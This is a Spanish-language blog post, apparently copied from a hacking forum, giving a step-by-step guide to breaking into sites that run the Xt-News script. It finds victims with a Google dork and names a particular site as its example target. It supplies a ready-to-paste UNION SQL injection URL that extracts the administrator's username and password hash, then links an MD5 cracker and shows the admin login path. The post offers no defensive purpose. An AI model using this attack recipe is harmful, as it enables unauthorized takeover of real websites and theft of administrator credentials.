Bueno esta vulneravilidad consiste en una injecction SQL.
Para empezar si quieres buscar vulneravilidades Xt-News Tienes que tipear esto en google.
“Powered by Xt-News”
Resultado de la busqueda en google: http://www.google.com.mx/search?client=firefox-a&rls=org.mozilla%3A%3Aofficial&channel=s&hl=es&q=Powered+by+Xt-News&meta=&btnG=Buscar+con+Google
Aora escogemos alguna web la que sea.
En mi caso escogi esta: http://polyrando.org/xtnews/print.php?id_news=206
Aora lo que bamos a haces es coger nuestra SQL injecction que es la siguiente:
show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1
Aora pegamos eso en nuetro navegador,Pero antes tienes que borrar print.php?id_news=206
Entonces nuestra url quedara asi:
http://polyrando.org/xtnews/show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1
Aora como vemos nos dira el user de admin: webmaster
y nos dira una hash la cual es el password:
| |||
aora solo falta crackear el password con algun md5
Aqui les dejo uno:http://rapidshare.com/files/40519889/mdcrack.rar
Aora lo que tienes que haces es descomprimir el mdcrack en su HD.
Y quedara asi:
C/mdcrack
aora para ejecutarlo ban a la consolo o ms-dos o cmd
y tipeamos esto
c:/mdcrack/mdcrack.exe
c:/mdcrack/mdcrack.exe
| |||
damos enter.
Esperamos a que nos de el password y para loguearnos tenemos que haces esto.
http://polyrando.org/xtnews/admin/
Solo tenemos que poner despues del ultimo / [admin] y directamente nos mandara a loguearnos como admin y tipeamos el user y el password.
Bueno eso es todo.
by: rUsH
Fuente:http://www.hslteam.org/foros/index.php?topic=5895.0
Entradas
No hay comentarios:
Publicar un comentario